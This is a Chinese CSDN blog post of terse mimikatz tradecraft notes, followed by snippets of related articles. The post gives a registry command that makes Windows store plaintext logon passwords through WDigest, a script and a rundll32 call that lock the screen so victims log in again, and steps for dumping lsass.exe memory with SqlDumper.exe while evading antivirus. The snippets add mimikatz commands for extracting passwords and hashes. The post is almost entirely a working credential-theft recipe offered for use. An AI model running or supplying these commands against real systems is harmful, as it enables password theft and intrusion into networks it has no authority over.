mimikatz注意事项

最新推荐文章于 2025-03-12 19:10:02 发布

weixin_46195145

最新推荐文章于 2025-03-12 19:10:02 发布

阅读量289

点赞数

本文链接：https://blog.csdn.net/weixin_46195145/article/details/104423571

版权

修改注册表让Wdigest Auth保存明文口令

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

lockscreen.ps1

Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

执行: powershell -file lockscreen.ps1

锁屏CMD

rundll32.exe user32.dll,LockWorkStation

压缩文件

makecab /d compressiontype=lzx c:\1.txt c:\1.rar

SqlDumper with mimikatz

SqlDumper.exe是从SQL Server安装目录下提取出来的，功能和prodump相似，具备一定免杀能力。SqlDumper.exe默认存放在c:\Program Files\Microsoft SQL Server\number\shared。

tasklist /svc |findstr lsass.exe
sqldumper.exe processID

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_46195145

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

技术分享 | mimikatz的常见使用方法

Uguardsec的博客

08-10

3434

0x00简介 Mimikatz 是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码， lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略，通常我们在登陆系统时输入密码之后，密码便会储存在 lsass内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中，而 mimikatz 正是通过对lsass逆算获取到明文密码！也就

mimipenguin以及mimikatz神器的使用。

max_ss的专栏

11-15

3947

参考：http://www.4hou.com/info/news/4213.html 1. mimipenguin 下载： https://github.com/huntergregal/mimipenguin os：kali-linux 必须是root权限下载后进入目录直接运行 ./mimipenguin 即可；然后直接得到账号密码信息。 2.mimikatz 下载...

参与评论您还未登录，请先登录后发表或查看评论

内网渗透神器（Mimikatz）——使用教程

W小哥

04-16

8万+

一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具，本意是用来个人测试，但由于其功能强大，能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试，可以说是渗透必备工具。二、Mimikatz命令 cls：清屏 standard：标准模块，基本命令 crypto：加密相关模块 sekurlsa：与证书相关的模块 kerberos： kerberos模块 privilege：提权相关模块 process：进程相关

内网渗透初探 | 小白简单学习内网渗透全流程，黑客技术零基础入门到精通教程！

最新发布

xnxqwzy的博客

03-12

571

以上便是我学习的简单地从外网获取shell，经过提权或不提权直接进行内网渗透的一个简单过程，其中涉及一些概念问题没有说的很明白，希望表哥们提点提点。以上仅为个人学习过程，可能知识点过于简单，望理解。

Mimikatz使用方法

她叫常玉莹

08-21

1万+

Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具，本意是用来个人测试，但由于其功能强大，能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试，可以说是渗透必备工具。 Mimikatz命令 cls：清屏 standa..

内网渗透----使用mimikatz获取windows登陆口令

浅笑996的博客

12-01

2157

以管理员运行后，可以随机打一些字符，进入如下界面输入aaa::aaa，可展示所有模块：可采用log命令，保存日志获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始，LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...

Mimikatz 使用小技巧

大方子

10-05

2765

1.记录 Mimikatz输出： C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件： C:\>mimikatz.exe ""privilege::debug"" &quo

mimikatz-2.2.0-20220919.zip

01-06

5. **安全注意事项** - 使用mimikatz需谨慎，因为它可能违反法律，除非在授权的渗透测试或研究中使用。 - 避免在生产环境中未经许可使用，以免引发法律问题。 - 安全补丁和更新：mimikatz可能会被用来绕过某些...

mimikatz_trunk-1_mimikatz_

10-03

通过阅读此文件，我们可以深入了解mimikatz的用途、如何运行以及需要注意的事项。 3. **kiwi_passwords.yar**：yar文件是一种规则文件，通常与网络嗅探工具如Burp Suite或YARA关联。在这个上下文中，"kiwi_...

mimikatz获取系统密码

03-28

### 使用mimikatz的注意事项 1. **权限要求**: 要成功运行mimikatz，通常需要本地管理员权限，但某些操作可能需要更高的权限，如域管理员。 2. **法律与道德**: 使用mimikatz必须遵守当地法律法规，确保在授权的...

mimikatz工具

03-08

**三、使用mimikatz的安全注意事项** 虽然mimikatz是一个强大的工具，但它也可能被滥用来进行非法活动。因此，只有在合法授权的环境下，例如进行安全审计或者渗透测试时，才能使用mimikatz。同时，使用者必须了解并...

mimikatz_trunk.zip

08-10

**安全注意事项** 尽管mimikatz是用于合法安全评估的工具，但未经许可的使用可能导致法律问题。在使用mimikatz进行任何操作前，必须确保拥有适当的授权和合规性。总而言之，mimikatz 2.2.0是一个强大的安全工具，...

windows Mimikatz使用方法

weixin_30657999的博客

02-21

758

Windows - Mimikatz Mimikatz - Execute commands Only one command PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit Mimikatz console (multiple commands) ...

mimikatz使用详解

qq_59468567的博客

04-12

1023

该模块是用于提权的模块，很多模块需要高权限运行，所以要先进行提权，只能用具有管理员权限的命令行窗口才可以执行成功，普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限，因此需要执行提权命令，如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。

法国大面包mimikatz使用方法

weixin_43534549的博客

05-12

1189

该工具可以让我们获取到Windows系统密码的明码运行软件后，输入两条命令：第一条：privilege::debug //提升权限第二条：sekurlsa::logonpasswords //抓取密码使用小技巧： 1.记录 Mimikatz输出： C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords ...

mimikatz常用命令总结

热门推荐

Shanfenglan's blog

08-27

24万+

前言在管理员权限下使用，如果没有管理员权限，基本每个功能都无法正常使用，切记。命令普通管理员权限可以执行的命令(密码查询与权限检测与日志记录) lsadump::lsa /inject 可以查看所有用户的所有详细信息 privilege::debug 打开第一个命令，且必须执行。 log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。 sekurlsa::logonpasswords 列出已登陆用户的密码（比较常用）域控权限才能执行的命令 lsadump::dc

使用mimikatz抓取windows管理员密码

whoim_i的博客

12-20

1万+

目录基于SAM文件的密码破解Mimikatz是个啥？mimikatz基础命令抓取windows密码使用mimikatz读取域控上所有域用户的hash值基于SAM文件的密码破解 SAM文件即账号密码数据库文件。当我们登录系统的时候，系统会自动地和 C:\Windows\System32\config\SAM 中的SAM文件自动校对，如发现此次密码与SAM文件中的加密数据符合时，你就会顺利登录;如...

win 7使用mimikatz实现MS14-068漏洞

weixin_46208714的博客

05-31

285

一、漏洞说明该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 12 ...

内网渗透中的mimikatz

ShadowAssassin的专栏

04-04

1515

原文: http://drops.wooyun.org/tips/7547 0x00 前言上篇测试了中间人攻击利用框架bettercap，这次挑选一款更具代表性的工具——mimikatz 0x01 简介 mimikatz，很多人称之为密码抓取神器，但在内网渗透中，远不止这么简单 0x02 测试环境网络资源管理模式：域已有资源：域内一台主机

安装mimikatz

01-10

#### 使用注意事项 当准备使用 mimikatz 时，确保将所需的任何额外配置文件置于 mimikatz 主目录之下，或者提供这些文件的确切位置给 mimikatz 命令行参数[^1]。请注意，由于 Mimikatz 功能强大且涉及敏感操作，仅...